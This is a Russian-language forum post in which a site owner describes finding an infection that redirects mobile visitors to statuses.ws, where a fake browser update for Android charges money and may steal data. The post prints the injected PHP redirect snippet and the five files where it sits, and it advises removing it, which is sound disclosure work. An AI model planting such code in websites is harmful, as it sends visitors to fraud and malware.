Войти
Регистрация
Вещь довольно хитрая и я стал удивляться, почему с нашего сайта просиходит редирект, я симулировал различные устройства и редиректа не было только с одного устройство - ПК(персонального компьютера). Многие знают, что я пользуюсь Mac OS, так вот тут очень замечательный и быстрый поиск. Я сделал back up сайта и попытался найти этот конечный редирект, то есть statuses.ws, но почему-то меня подвела моя операционная система и ничего не нашла. Не знаю почему, но мне в голову взбрело сделать медленный редирект по сайтам, то есть с затормаживанием. И тут оказалось, что мы посещаем еще один сайт(не помню точно его адрес) и там я прочитал чудо-условия. Для пользователей Android скачивается программа, якобы браузер устарел и пора сменить его. За установку этого "браузера" списывается с телефона 1062 рубля. Причем не просто списывается, а будет списываться, пока у вас не станет все по нулям. Эта программа судя по всему может читать/отправлять смс, воровать все данные с мобильного устройства. Я не стал устанавливать данный бред, так как из требований это было понятно. Тот сайт действует абсолютно легально, так что придраться не к чему, разве что к государственным законам, но это уже другое дело.
Борьба с дырой:
Думаю ее нужно будет проводить регулярно, так как оффициальный фикс не очень помогает.
engine\data\config.php в самом низу
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}
engine\data\dbconfig.php в самом низу
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}
engine\engine.php
строка 761
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}
engine\init.php
строка 126
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}
index.php
строка 274
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}
Если есть такой код в файлах, поздровляю ваш сайт заражон) Удаляйте этот код, и проверяйте эти файлы каждый день!
P.S. Не знал в какой раздел кинуть, если что перенесите, опасность высокая есть вероятность что ваш сайт забанят поисковые системы как вымогателей, и могут быть проблемы с законом
Наверх
